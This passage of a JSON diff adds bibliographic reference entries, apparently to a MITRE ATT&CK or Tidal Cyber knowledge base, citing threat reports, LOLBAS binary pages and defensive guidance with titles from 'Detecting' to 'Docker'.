"2022-09-28T00:00:00Z", + "date_published": "2020-09-30T00:00:00Z", + "refs": [ + "https://www.mandiant.com/resources/detecting-microsoft-365-azure-active-directory-backdoors" + ], + "source": "MITRE", + "title": "Detecting Microsoft 365 and Azure Active Directory Backdoors" + }, + "related": [], + "uuid": "7b4502ff-a45c-4ba7-b00e-ca9f6e9c2ac8", + "value": "Mandiant Azure AD Backdoors" + }, + { + "description": "Loh, I. (2018, December 21). Detecting Parent PID Spoofing. Retrieved June 3, 2019.", + "meta": { + "date_accessed": "2019-06-03T00:00:00Z", + "date_published": "2018-12-21T00:00:00Z", + "refs": [ + "https://www.countercept.com/blog/detecting-parent-pid-spoofing/" + ], + "source": "MITRE", + "title": "Detecting Parent PID Spoofing" + }, + "related": [], + "uuid": "a1fdb8db-4c5f-4fb9-a013-b232cd8471f8", + "value": "CounterCept PPID Spoofing Dec 2018" + }, + { + "description": "CISA. (2021, January 8). Detecting Post-Compromise Threat Activity in Microsoft Cloud Environments. Retrieved January 8, 2021.", + "meta": { + "date_accessed": "2021-01-08T00:00:00Z", + "date_published": "2021-01-08T00:00:00Z", + "refs": [ + "https://us-cert.cisa.gov/ncas/alerts/aa21-008a" + ], + "source": "MITRE", + "title": "Detecting Post-Compromise Threat Activity in Microsoft Cloud Environments" + }, + "related": [], + "uuid": "b8fd5fe3-dbfa-4f28-a9b5-39f1d7db9e62", + "value": "CISA SolarWinds Cloud Detection" + }, + { + "description": "Aaron Greetham. (2021, May 27). Detecting Rclone – An Effective Tool for Exfiltration. Retrieved August 30, 2022.", + "meta": { + "date_accessed": "2022-08-30T00:00:00Z", + "date_published": "2021-05-27T00:00:00Z", + "refs": [ + "https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/" + ], + "source": "MITRE", + "title": "Detecting Rclone – An Effective Tool for Exfiltration" + }, + "related": [], + "uuid": "2e44290c-32f5-4e7f-96de-9874df79fe89", + "value": "Detecting Rclone" + }, + { + "description": "French, D. (2018, October 9). Detecting & Removing an Attacker’s WMI Persistence. Retrieved October 11, 2019.", + "meta": { + "date_accessed": "2019-10-11T00:00:00Z", + "date_published": "2018-10-09T00:00:00Z", + "refs": [ + "https://medium.com/threatpunter/detecting-removing-wmi-persistence-60ccbb7dff96" + ], + "source": "MITRE", + "title": "Detecting & Removing an Attacker’s WMI Persistence" + }, + "related": [], + "uuid": "539e7cd0-d1e9-46ba-96fe-d8a1061c857e", + "value": "Medium Detecting WMI Persistence" + }, + { + "description": "Okta. (2022, August 25). Detecting Scatter Swine: Insights into a Relentless Phishing Campaign. Retrieved February 24, 2023.", + "meta": { + "date_accessed": "2023-02-24T00:00:00Z", + "date_published": "2022-08-25T00:00:00Z", + "refs": [ + "https://sec.okta.com/scatterswine" + ], + "source": "MITRE", + "title": "Detecting Scatter Swine: Insights into a Relentless Phishing Campaign" + }, + "related": [], + "uuid": "66d1b6e2-c069-5832-b549-fc5f0edeed40", + "value": "Okta Scatter Swine 2022" + }, + { + "description": "Stoner, J. (2021, January 21). Detecting Supernova Malware: SolarWinds Continued. Retrieved February 22, 2021.", + "meta": { + "date_accessed": "2021-02-22T00:00:00Z", + "date_published": "2021-01-21T00:00:00Z", + "refs": [ + "https://www.splunk.com/en_us/blog/security/detecting-supernova-malware-solarwinds-continued.html" + ], + "source": "MITRE", + "title": "Detecting Supernova Malware: SolarWinds Continued" + }, + "related": [], + "uuid": "7e43bda5-0978-46aa-b3b3-66ffb62b9fdb", + "value": "Splunk Supernova Jan 2021" + }, + { + "description": "Cap, P., et al. (2017, January 25). Detecting threat actors in recent German industrial attacks with Windows Defender ATP. Retrieved February 8, 2017.", + "meta": { + "date_accessed": "2017-02-08T00:00:00Z", + "date_published": "2017-01-25T00:00:00Z", + "refs": [ + "https://blogs.technet.microsoft.com/mmpc/2017/01/25/detecting-threat-actors-in-recent-german-industrial-attacks-with-windows-defender-atp/" + ], + "source": "MITRE", + "title": "Detecting threat actors in recent German industrial attacks with Windows Defender ATP" + }, + "related": [], + "uuid": "6b63fac9-4bde-4fc8-a016-e77c8485fab7", + "value": "Microsoft Winnti Jan 2017" + }, + { + "description": "stderr. (2014, February 14). Detecting Userland Preload Rootkits. Retrieved December 20, 2017.", + "meta": { + "date_accessed": "2017-12-20T00:00:00Z", + "date_published": "2014-02-14T00:00:00Z", + "refs": [ + "http://www.chokepoint.net/2014/02/detecting-userland-preload-rootkits.html" + ], + "source": "MITRE", + "title": "Detecting Userland Preload Rootkits" + }, + "related": [], + "uuid": "16c00830-eade-40e2-9ee6-6e1af4b58e5d", + "value": "Chokepoint preload rootkits" + }, + { + "description": "Sygnia. (2020, December). Detection and Hunting of Golden SAML Attack. Retrieved January 6, 2021.", + "meta": { + "date_accessed": "2021-01-06T00:00:00Z", + "date_published": "2020-12-01T00:00:00Z", + "refs": [ + "https://www.sygnia.co/golden-saml-advisory" + ], + "source": "MITRE", + "title": "Detection and Hunting of Golden SAML Attack" + }, + "related": [], + "uuid": "1a6673b0-2a30-481e-a2a4-9e17e2676c5d", + "value": "Sygnia Golden SAML" + }, + { + "description": "Bromiley, M. et al. (2021, March 4). Detection and Response to Exploitation of Microsoft Exchange Zero-Day Vulnerabilities. Retrieved March 9, 2021.", + "meta": { + "date_accessed": "2021-03-09T00:00:00Z", + "date_published": "2021-03-04T00:00:00Z", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2021/03/detection-response-to-exploitation-of-microsoft-exchange-zero-day-vulnerabilities.html" + ], + "source": "MITRE", + "title": "Detection and Response to Exploitation of Microsoft Exchange Zero-Day Vulnerabilities" + }, + "related": [], + "uuid": "5e5452a4-c3f5-4802-bcb4-198612cc8282", + "value": "FireEye Exchange Zero Days March 2021" + }, + { + "description": "Microsoft. (2022, March 22). DEV-0537 criminal actor targeting organizations for data exfiltration and destruction. Retrieved March 23, 2022.", + "meta": { + "date_accessed": "2022-03-23T00:00:00Z", + "date_published": "2022-03-22T00:00:00Z", + "refs": [ + "https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/" + ], + "source": "MITRE", + "title": "DEV-0537 criminal actor targeting organizations for data exfiltration and destruction" + }, + "related": [], + "uuid": "2f7a59f3-620d-4e2e-8595-af96cd4e16c3", + "value": "Microsoft DEV-0537" + }, + { + "description": "MSTIC, DART, M365 Defender. (2022, March 24). DEV-0537 Criminal Actor Targeting Organizations for Data Exfiltration and Destruction. Retrieved May 17, 2022.", + "meta": { + "date_accessed": "2022-05-17T00:00:00Z", + "date_published": "2022-03-24T00:00:00Z", + "refs": [ + "https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/" + ], + "source": "MITRE", + "title": "DEV-0537 Criminal Actor Targeting Organizations for Data Exfiltration and Destruction" + }, + "related": [], + "uuid": "a9ce7e34-6e7d-4681-9869-8e8f2b5b0390", + "value": "MSTIC DEV-0537 Mar 2022" + }, + { + "description": "MSTIC. (2022, November 17). DEV-0569 finds new ways to deliver Royal ransomware, various payloads. Retrieved March 30, 2023.", + "meta": { + "date_accessed": "2023-03-30T00:00:00Z", + "date_published": "2022-11-17T00:00:00Z", + "refs": [ + "https://www.microsoft.com/en-us/security/blog/2022/11/17/dev-0569-finds-new-ways-to-deliver-royal-ransomware-various-payloads/" + ], + "source": "MITRE", + "title": "DEV-0569 finds new ways to deliver Royal ransomware, various payloads" + }, + "related": [], + "uuid": "91efc6bf-e15c-514a-96c1-e838268d222f", + "value": "Microsoft Royal ransomware November 2022" + }, + { + "description": "Felix 'FX' Lindner. (2008, February). Developments in Cisco IOS Forensics. Retrieved October 21, 2020.", + "meta": { + "date_accessed": "2020-10-21T00:00:00Z", + "date_published": "2008-02-01T00:00:00Z", + "refs": [ + "https://www.recurity-labs.com/research/RecurityLabs_Developments_in_IOS_Forensics.pdf" + ], + "source": "MITRE", + "title": "Developments in Cisco IOS Forensics" + }, + "related": [], + "uuid": "95fdf251-f40d-4f7a-bb12-8762e9c961b9", + "value": "Cisco IOS Forensics Developments" + }, + { + "description": "LOLBAS. (2021, August 16). DeviceCredentialDeployment.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2021-08-16T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/DeviceCredentialDeployment/" + ], + "source": "Tidal Cyber", + "title": "DeviceCredentialDeployment.exe" + }, + "related": [], + "uuid": "fef281e8-8138-4420-b11b-66d1e6a19805", + "value": "DeviceCredentialDeployment.exe - LOLBAS Project" + }, + { + "description": "Graeber, M. (2016, November 13). DeviceGuardBypassMitigationRules. Retrieved November 30, 2016.", + "meta": { + "date_accessed": "2016-11-30T00:00:00Z", + "date_published": "2016-11-13T00:00:00Z", + "refs": [ + "https://github.com/mattifestation/DeviceGuardBypassMitigationRules" + ], + "source": "MITRE", + "title": "DeviceGuardBypassMitigationRules" + }, + "related": [], + "uuid": "4ecd64b4-8014-447a-91d2-a431f4adbfcd", + "value": "GitHub mattifestation DeviceGuardBypass" + }, + { + "description": "LOLBAS. (2022, January 20). Devinit.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2022-01-20T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Devinit/" + ], + "source": "Tidal Cyber", + "title": "Devinit.exe" + }, + "related": [], + "uuid": "27343583-c17d-4c11-a7e3-14d725756556", + "value": "Devinit.exe - LOLBAS Project" + }, + { + "description": "LOLBAS. (2019, October 4). Devtoolslauncher.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2019-10-04T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Devtoolslauncher/" + ], + "source": "Tidal Cyber", + "title": "Devtoolslauncher.exe" + }, + "related": [], + "uuid": "cb263978-019c-40c6-b6de-61db0e7a8941", + "value": "Devtoolslauncher.exe - LOLBAS Project" + }, + { + "description": "LOLBAS. (2023, September 16). devtunnel.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2023-09-16T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/devtunnels/" + ], + "source": "Tidal Cyber", + "title": "devtunnel.exe" + }, + "related": [], + "uuid": "657c8b4c-1eee-4997-8461-c7592eaed9e8", + "value": "devtunnel.exe - LOLBAS Project" + }, + { + "description": "LOLBAS. (2018, May 25). Dfshim.dll. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2018-05-25T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Libraries/Dfshim/" + ], + "source": "Tidal Cyber", + "title": "Dfshim.dll" + }, + "related": [], + "uuid": "30503e42-6047-46a9-8189-e6caa5f4deb0", + "value": "Dfshim.dll - LOLBAS Project" + }, + { + "description": "LOLBAS. (2018, May 25). Dfsvc.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2018-05-25T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Dfsvc/" + ], + "source": "Tidal Cyber", + "title": "Dfsvc.exe" + }, + "related": [], + "uuid": "7f3a78c0-68b2-4a9d-ae6a-6e63e8ddac3f", + "value": "Dfsvc.exe - LOLBAS Project" + }, + { + "description": "Microsoft. (2006, August 31). DHCP Server Operational Events. Retrieved March 7, 2022.", + "meta": { + "date_accessed": "2022-03-07T00:00:00Z", + "date_published": "2006-08-31T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn800668(v=ws.11)" + ], + "source": "MITRE", + "title": "DHCP Server Operational Events" + }, + "related": [], + "uuid": "e2b1e810-2a78-4553-8927-38ed5fba0f38", + "value": "dhcp_serv_op_events" + }, + { + "description": "Mello, V. (2018, March 8). Diamorphine - LMK rootkit for Linux Kernels 2.6.x/3.x/4.x (x86 and x86_64). Retrieved April 9, 2018.", + "meta": { + "date_accessed": "2018-04-09T00:00:00Z", + "date_published": "2018-03-08T00:00:00Z", + "refs": [ + "https://github.com/m0nad/Diamorphine" + ], + "source": "MITRE", + "title": "Diamorphine - LMK rootkit for Linux Kernels 2.6.x/3.x/4.x (x86 and x86_64)" + }, + "related": [], + "uuid": "92993055-d2e6-46b2-92a3-ad70b62e4cc0", + "value": "GitHub Diamorphine" + }, + { + "description": "Living Off The Land Binaries, Scripts and Libraries (LOLBAS). (n.d.). Diantz.exe. Retrieved October 25, 2021.", + "meta": { + "date_accessed": "2021-10-25T00:00:00Z", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Diantz/" + ], + "source": "MITRE", + "title": "Diantz.exe" + }, + "related": [], + "uuid": "66652db8-5594-414f-8a6b-83d708a0c1fa", + "value": "diantz.exe_lolbas" + }, + { + "description": "Neeamni, D., Rubinfeld, A.. (2021, July 1). Diavol - A New Ransomware Used By Wizard Spider?. Retrieved November 12, 2021.", + "meta": { + "date_accessed": "2021-11-12T00:00:00Z", + "date_published": "2021-07-01T00:00:00Z", + "refs": [ + "https://www.fortinet.com/blog/threat-research/diavol-new-ransomware-used-by-wizard-spider" + ], + "source": "MITRE", + "title": "Diavol - A New Ransomware Used By Wizard Spider?" + }, + "related": [], + "uuid": "28c650f2-8ce8-4c78-ab4a-cae56c1548ed", + "value": "Fortinet Diavol July 2021" + }, + { + "description": "DFIR Report. (2021, December 13). Diavol Ransomware. Retrieved March 9, 2022.", + "meta": { + "date_accessed": "2022-03-09T00:00:00Z", + "date_published": "2021-12-13T00:00:00Z", + "refs": [ + "https://thedfirreport.com/2021/12/13/diavol-ransomware/" + ], + "source": "MITRE", + "title": "Diavol Ransomware" + }, + "related": [], + "uuid": "eb89f18d-684c-4220-b2a8-967f1f8f9162", + "value": "DFIR Diavol Ransomware December 2021" + }, + { + "description": "Guarnieri, C. (2015, June 19). Digital Attack on German Parliament: Investigative Report on the Hack of the Left Party Infrastructure in Bundestag. Retrieved January 22, 2018.", + "meta": { + "date_accessed": "2018-01-22T00:00:00Z", + "date_published": "2015-06-19T00:00:00Z", + "refs": [ + "https://netzpolitik.org/2015/digital-attack-on-german-parliament-investigative-report-on-the-hack-of-the-left-party-infrastructure-in-bundestag/" + ], + "source": "MITRE", + "title": "Digital Attack on German Parliament: Investigative Report on the Hack of the Left Party Infrastructure in Bundestag" + }, + "related": [], + "uuid": "3b85fff0-88d8-4df6-af0b-66e57492732e", + "value": "Überwachung APT28 Forfiles June 2015" + }, + { + "description": "Microsoft. (2017, June 1). Digital Signatures for Kernel Modules on Windows. Retrieved April 22, 2021.", + "meta": { + "date_accessed": "2021-04-22T00:00:00Z", + "date_published": "2017-06-01T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/previous-versions/windows/hardware/design/dn653559(v=vs.85)?redirectedfrom=MSDN" + ], + "source": "MITRE", + "title": "Digital Signatures for Kernel Modules on Windows" + }, + "related": [], + "uuid": "451bdfe3-0b30-425c-97a0-44727b70c1da", + "value": "Microsoft DSE June 2017" + }, + { + "description": "ESET, et al. (2018, January). Diplomats in Eastern Europe bitten by a Turla mosquito. Retrieved July 3, 2018.", + "meta": { + "date_accessed": "2018-07-03T00:00:00Z", + "date_published": "2018-01-01T00:00:00Z", + "refs": [ + "https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf" + ], + "source": "MITRE", + "title": "Diplomats in Eastern Europe bitten by a Turla mosquito" + }, + "related": [], + "uuid": "cd177c2e-ef22-47be-9926-61e25fd5f33b", + "value": "ESET Turla Mosquito Jan 2018" + }, + { + "description": "Microsoft. (n.d.). Dir. Retrieved April 18, 2016.", + "meta": { + "date_accessed": "2016-04-18T00:00:00Z", + "refs": [ + "https://technet.microsoft.com/en-us/library/cc755121.aspx" + ], + "source": "MITRE", + "title": "Dir" + }, + "related": [], + "uuid": "f1eb8631-6bea-4688-a5ff-a388b1fdceb0", + "value": "TechNet Dir" + }, + { + "description": "Ulf Frisk. (2016, August 5). Direct Memory Attack the Kernel. Retrieved March 30, 2018.", + "meta": { + "date_accessed": "2018-03-30T00:00:00Z", + "date_published": "2016-08-05T00:00:00Z", + "refs": [ + "https://www.youtube.com/watch?v=fXthwl6ShOg" + ], + "source": "MITRE", + "title": "Direct Memory Attack the Kernel" + }, + "related": [], + "uuid": "c504485b-2daa-4159-96da-481a0b97a979", + "value": "Frisk DMA August 2016" + }, + { + "description": "Feichter, D. (2023, June 30). Direct Syscalls vs Indirect Syscalls. Retrieved September 27, 2023.", + "meta": { + "date_accessed": "2023-09-27T00:00:00Z", + "date_published": "2023-06-30T00:00:00Z", + "refs": [ + "https://redops.at/en/blog/direct-syscalls-vs-indirect-syscalls" + ], + "source": "MITRE", + "title": "Direct Syscalls vs Indirect Syscalls" + }, + "related": [], + "uuid": "dd8c2edd-b5ba-5a41-b65d-c3a2951d07b8", + "value": "Redops Syscalls" + }, + { + "description": "Dormann, W. (2017, October 20). Disable DDEAUTO for Outlook, Word, OneNote, and Excel versions 2010, 2013, 2016. Retrieved February 3, 2018.", + "meta": { + "date_accessed": "2018-02-03T00:00:00Z", + "date_published": "2017-10-20T00:00:00Z", + "refs": [ + "https://gist.github.com/wdormann/732bb88d9b5dd5a66c9f1e1498f31a1b" + ], + "source": "MITRE", + "title": "Disable DDEAUTO for Outlook, Word, OneNote, and Excel versions 2010, 2013, 2016" + }, + "related": [], + "uuid": "eea0dd34-4efa-4093-bd11-a59d1601868f", + "value": "GitHub Disable DDEAUTO Oct 2017" + }, + { + "description": "wordmann. (2022, February 8). Disable Disc Imgage. Retrieved February 8, 2022.", + "meta": { + "date_accessed": "2022-02-08T00:00:00Z", + "date_published": "2022-02-08T00:00:00Z", + "refs": [ + "https://gist.github.com/wdormann/fca29e0dcda8b5c0472e73e10c78c3e7" + ], + "source": "MITRE", + "title": "Disable Disc Imgage" + }, + "related": [], + "uuid": "2155591e-eacf-4575-b7a6-f031675ef1b3", + "value": "Disable automount for ISO" + }, + { + "description": "dmcxblue. (n.d.). Disable Windows Event Logging. Retrieved September 10, 2021.", + "meta": { + "date_accessed": "2021-09-10T00:00:00Z", + "refs": [ + "https://dmcxblue.gitbook.io/red-team-notes-2-0/red-team-techniques/defense-evasion/t1562-impair-defenses/disable-windows-event-logging" + ], + "source": "MITRE", + "title": "Disable Windows Event Logging" + }, + "related": [], + "uuid": "0fa5e507-33dc-40ea-b960-bcd9aa024ab1", + "value": "Disable_Win_Event_Logging" + }, + { + "description": "wdormann. (2019, August 29). Disable Windows Explorer file associations for Disc Image Mount. Retrieved April 16, 2022.", + "meta": { + "date_accessed": "2022-04-16T00:00:00Z", + "date_published": "2019-08-29T00:00:00Z", + "refs": [ + "https://gist.github.com/wdormann/fca29e0dcda8b5c0472e73e10c78c3e7" + ], + "source": "MITRE", + "title": "Disable Windows Explorer file associations for Disc Image Mount" + }, + "related": [], + "uuid": "044aa74a-9320-496a-9d15-37d8b934c244", + "value": "GitHub MOTW" + }, + { + "description": "Apple. (n.d.). Disabling and Enabling System Integrity Protection. Retrieved April 22, 2021.", + "meta": { + "date_accessed": "2021-04-22T00:00:00Z", + "refs": [ + "https://developer.apple.com/documentation/security/disabling_and_enabling_system_integrity_protection" + ], + "source": "MITRE", + "title": "Disabling and Enabling System Integrity Protection" + }, + "related": [], + "uuid": "d7545e0c-f0b7-4be4-800b-06a02240385e", + "value": "Apple Disable SIP" + }, + { + "description": "Microsoft. (2009, February 9). Disabling Bluetooth and Infrared Beaming. Retrieved July 26, 2018.", + "meta": { + "date_accessed": "2018-07-26T00:00:00Z", + "date_published": "2009-02-09T00:00:00Z", + "refs": [ + "https://technet.microsoft.com/library/dd252791.aspx" + ], + "source": "MITRE", + "title": "Disabling Bluetooth and Infrared Beaming" + }, + "related": [], + "uuid": "27573597-5269-4894-87fb-24afcdb8f30a", + "value": "Microsoft GPO Bluetooth FEB 2009" + }, + { + "description": "Kondratiev, A. (n.d.). Disabling dangerous PHP functions. Retrieved July 26, 2021.", + "meta": { + "date_accessed": "2021-07-26T00:00:00Z", + "refs": [ + "https://itsyndicate.org/blog/disabling-dangerous-php-functions/" + ], + "source": "MITRE", + "title": "Disabling dangerous PHP functions" + }, + "related": [], + "uuid": "6e91f485-5777-4a06-94a3-cdc4718a8e39", + "value": "ITSyndicate Disabling PHP functions" + }, + { + "description": "TheDFIRReport. (2022, March 1). Disabling notifications on Synology servers before ransom. Retrieved October 19, 2022.", + "meta": { + "date_accessed": "2022-10-19T00:00:00Z", + "date_published": "2022-03-01T00:00:00Z", + "refs": [ + "https://twitter.com/TheDFIRReport/status/1498657590259109894" + ], + "source": "MITRE", + "title": "Disabling notifications on Synology servers before ransom" + }, + "related": [], + "uuid": "d53e8f89-df78-565b-a316-cf2644c5ed36", + "value": "disable_notif_synology_ransom" + }, + { + "description": "LOLBAS. (2018, May 25). Diskshadow.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2018-05-25T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Diskshadow/" + ], + "source": "Tidal Cyber", + "title": "Diskshadow.exe" + }, + "related": [], + "uuid": "27a3f0b4-e699-4319-8b52-8eae4581faa2", + "value": "Diskshadow.exe - LOLBAS Project" + }, + { + "description": "Vrabie, V. (2020, November). Dissecting a Chinese APT Targeting South Eastern Asian Government Institutions. Retrieved September 19, 2022.", + "meta": { + "date_accessed": "2022-09-19T00:00:00Z", + "date_published": "2020-11-01T00:00:00Z", + "refs": [ + "https://www.bitdefender.com/files/News/CaseStudies/study/379/Bitdefender-Whitepaper-Chinese-APT.pdf" + ], + "source": "MITRE", + "title": "Dissecting a Chinese APT Targeting South Eastern Asian Government Institutions" + }, + "related": [], + "uuid": "b62a9f2c-02ca-4dfa-95fc-5dc6ad9568de", + "value": "Bitdefender FunnyDream Campaign November 2020" + }, + { + "description": "Maniath, S. and Kadam P. (2019, March 19). Dissecting a NETWIRE Phishing Campaign's Usage of Process Hollowing. Retrieved January 7, 2021.", + "meta": { + "date_accessed": "2021-01-07T00:00:00Z", + "date_published": "2019-03-19T00:00:00Z", + "refs": [ + "https://www.mandiant.com/resources/blog/dissecting-netwire-phishing-campaigns-usage-process-hollowing" + ], + "source": "MITRE", + "title": "Dissecting a NETWIRE Phishing Campaign's Usage of Process Hollowing" + }, + "related": [], + "uuid": "404d4f7e-62de-4483-9320-a90fb255e783", + "value": "FireEye NETWIRE March 2019" + }, + { + "description": "Sternfeld, U. (2016). Dissecting Domain Generation Algorithms: Eight Real World DGA Variants. Retrieved February 18, 2019.", + "meta": { + "date_accessed": "2019-02-18T00:00:00Z", + "date_published": "2016-01-01T00:00:00Z", + "refs": [ + "http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-Dissecting-DGAs-Eight-Real-World-DGA-Variants.pdf" + ], + "source": "MITRE", + "title": "Dissecting Domain Generation Algorithms: Eight Real World DGA Variants" + }, + "related": [], + "uuid": "9888cdb6-fe85-49b4-937c-75005ac9660d", + "value": "Cybereason Dissecting DGAs" + }, + { + "description": "Dunwoody, M.. (2017, April 3). Dissecting One of APT29’s Fileless WMI and PowerShell Backdoors (POSHSPY). Retrieved April 5, 2017.", + "meta": { + "date_accessed": "2017-04-05T00:00:00Z", + "date_published": "2017-04-03T00:00:00Z", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html" + ], + "source": "MITRE", + "title": "Dissecting One of APT29’s Fileless WMI and PowerShell Backdoors (POSHSPY)" + }, + "related": [], + "uuid": "b1271e05-80d7-4761-a13f-b6f0db7d7e5a", + "value": "FireEye POSHSPY April 2017" + }, + { + "description": "Microsoft. (2011, January 12). Distributed Transaction Coordinator. Retrieved February 25, 2016.", + "meta": { + "date_accessed": "2016-02-25T00:00:00Z", + "date_published": "2011-01-12T00:00:00Z", + "refs": [ + "https://technet.microsoft.com/en-us/library/cc759136(v=ws.10).aspx" + ], + "source": "MITRE", + "title": "Distributed Transaction Coordinator" + }, + "related": [], + "uuid": "d2a1aab3-a4c9-4583-9cf8-170eeb77d828", + "value": "Microsoft DTC" + }, + { + "description": "Nick Harbour. (2010, September 1). DLL Search Order Hijacking Revisited. Retrieved March 13, 2020.", + "meta": { + "date_accessed": "2020-03-13T00:00:00Z", + "date_published": "2010-09-01T00:00:00Z", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2010/08/dll-search-order-hijacking-revisited.html" + ], + "source": "MITRE", + "title": "DLL Search Order Hijacking Revisited" + }, + "related": [], + "uuid": "0ba2675d-4d7f-406a-81fa-b87e62d7a539", + "value": "FireEye DLL Search Order Hijacking" + }, + { + "description": "Mandiant. (2010, August 31). DLL Search Order Hijacking Revisited. Retrieved December 5, 2014.", + "meta": { + "date_accessed": "2014-12-05T00:00:00Z", + "date_published": "2010-08-31T00:00:00Z", + "refs": [ + "https://www.mandiant.com/blog/dll-search-order-hijacking-revisited/" + ], + "source": "MITRE", + "title": "DLL Search Order Hijacking Revisited" + }, + "related": [], + "uuid": "2f602a6c-0305-457c-b329-a17b55d8e094", + "value": "Mandiant Search Order" + }, + { + "description": "Stewart, A. (2014). DLL SIDE-LOADING: A Thorn in the Side of the Anti-Virus Industry. Retrieved November 12, 2014.", + "meta": { + "date_accessed": "2014-11-12T00:00:00Z", + "date_published": "2014-01-01T00:00:00Z", + "refs": [ + "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf" + ], + "source": "MITRE", + "title": "DLL SIDE-LOADING: A Thorn in the Side of the Anti-Virus Industry" + }, + "related": [], + "uuid": "813905b5-7aa5-4bab-b2ac-eaafdea55805", + "value": "Stewart 2014" + }, + { + "description": "LOLBAS. (2018, May 25). Dnscmd.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2018-05-25T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Dnscmd/" + ], + "source": "Tidal Cyber", + "title": "Dnscmd.exe" + }, + "related": [], + "uuid": "3571ca9d-3388-4e74-8b30-dd92ef2b5f10", + "value": "Dnscmd.exe - LOLBAS Project" + }, + { + "description": "Microsoft. (2023, February 3). Dnscmd Microsoft. Retrieved July 11, 2023.", + "meta": { + "date_accessed": "2023-07-11T00:00:00Z", + "date_published": "2023-02-03T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/dnscmd" + ], + "source": "Tidal Cyber", + "title": "Dnscmd Microsoft" + }, + "related": [], + "uuid": "24b1cb7b-357f-470f-9715-fa0ec3958cbb", + "value": "Dnscmd Microsoft" + }, + { + "description": "Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020.", + "meta": { + "date_accessed": "2020-10-20T00:00:00Z", + "refs": [ + "https://dnsdumpster.com/" + ], + "source": "MITRE", + "title": "DNS Dumpster" + }, + "related": [], + "uuid": "0bbe1e50-28af-4265-a493-4bb4fd693bad", + "value": "DNS Dumpster" + }, + { + "description": "Mercer, W., Rascagneres, P. (2018, November 27). DNSpionage Campaign Targets Middle East. Retrieved October 9, 2020.", + "meta": { + "date_accessed": "2020-10-09T00:00:00Z", + "date_published": "2018-11-27T00:00:00Z", + "refs": [ + "https://blog.talosintelligence.com/2018/11/dnspionage-campaign-targets-middle-east.html" + ], + "source": "MITRE", + "title": "DNSpionage Campaign Targets Middle East" + }, + "related": [], + "uuid": "d597ad7d-f808-4289-b42a-79807248c2d6", + "value": "Talos DNSpionage Nov 2018" + }, + { + "description": "Hinchliffe, A. (2019, March 15). DNS Tunneling: how DNS can be (ab)used by malicious actors. Retrieved October 3, 2020.", + "meta": { + "date_accessed": "2020-10-03T00:00:00Z", + "date_published": "2019-03-15T00:00:00Z", + "refs": [ + "https://unit42.paloaltonetworks.com/dns-tunneling-how-dns-can-be-abused-by-malicious-actors/" + ], + "source": "MITRE", + "title": "DNS Tunneling: how DNS can be (ab)used by malicious actors" + }, + "related": [], + "uuid": "e41fde80-5ced-4f66-9852-392d1ef79520", + "value": "Unit42 DNS Mar 2019" + }, + { + "description": "LOLBAS. (2018, May 25). dnx.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2018-05-25T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dnx/" + ], + "source": "Tidal Cyber", + "title": "dnx.exe" + }, + "related": [], + "uuid": "50652a27-c47b-41d4-a2eb-2ebf74e5bd09", + "value": "dnx.exe - LOLBAS Project" + }, + { + "description": "Docker. (n.d.). DockerD CLI. Retrieved March 29, 2021.", + "meta": { + "date_accessed": "2021-03-29T00:00:00Z", + "refs": [ + "https://docs.docker.com/engine/reference/commandline/dockerd/" + ], + "source": "MITRE", + "title": "DockerD CLI" + }, + "related": [], + "uuid": "ea86eae4-6ad4-4d79-9dd3-dd965a7feb5c", + "value": "Docker Daemon CLI" + }, + { + "description": "Docker. (n.d.). Docker Engine API v1.41 Reference. Retrieved March 31, 2021.", + "meta": { + "date_accessed": "2021-03-31T00:00:00Z", + "refs": [ + "https://docs.docker.com/engine/api/v1.41/" 